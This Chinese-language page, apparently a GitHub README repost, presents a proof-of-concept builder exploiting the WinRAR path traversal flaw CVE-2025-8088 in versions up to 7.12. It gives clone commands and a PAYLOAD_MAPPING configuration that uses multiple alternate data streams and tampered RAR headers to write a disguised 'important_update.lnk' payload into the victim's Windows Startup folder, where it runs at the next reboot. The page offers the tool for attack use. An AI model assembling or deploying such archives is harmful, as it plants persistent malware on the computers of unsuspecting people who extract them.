本文详细介绍了针对WinRAR路径遍历漏洞(CVE-2025-8088)的POC利用方法,涉及RAR文件结构操作、多ADS流利用技术,能够将恶意载荷写入Windows启动目录实现持久化攻击。
CVE-2025-8088-WinRAR构建器
针对影响7.12及更低版本WinRAR漏洞(CVE-2025-8088)的POC利用程序
🚀 工作原理
- 创建包含其他载荷的RAR嵌入文件
- 使用多ADS流🔄 - 附加具有不同路径遍历深度的载荷流
- 操作RAR头文件⚙️ - 修改存档结构以利用路径遍历漏洞
- 将载荷投放至启动文件夹📂 - 在解压时尝试将载荷写入Windows启动文件夹
🛠️ 使用方法
- 克隆仓库
1
2
|
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
|
- 准备载荷
- 将载荷添加到该文件夹(exe、dll、lnk等)
- 修改脚本中的
PAYLOAD_MAPPING
1
2
3
4
5
6
7
8
9
10
11
12
|
# 2. 将我们的载荷映射到相应的目标位置
# 格式:(payloads_dir中的文件名,目标提取路径)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
# 载荷1
("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),
# 载荷2
("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),
# 载荷3
# 添加你自己的载荷
]
|
- 运行利用程序
🔄 执行流程
- 受害者使用易受攻击的WinRAR(≤7.12)解压RAR文件
- 载荷被写入目标文件夹,例如:
1
|
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
|
- 下次重启时➡️载荷自动执行
📋 要求
- Windows操作系统🪟
- Python 3.x🐍
- 已安装WinRAR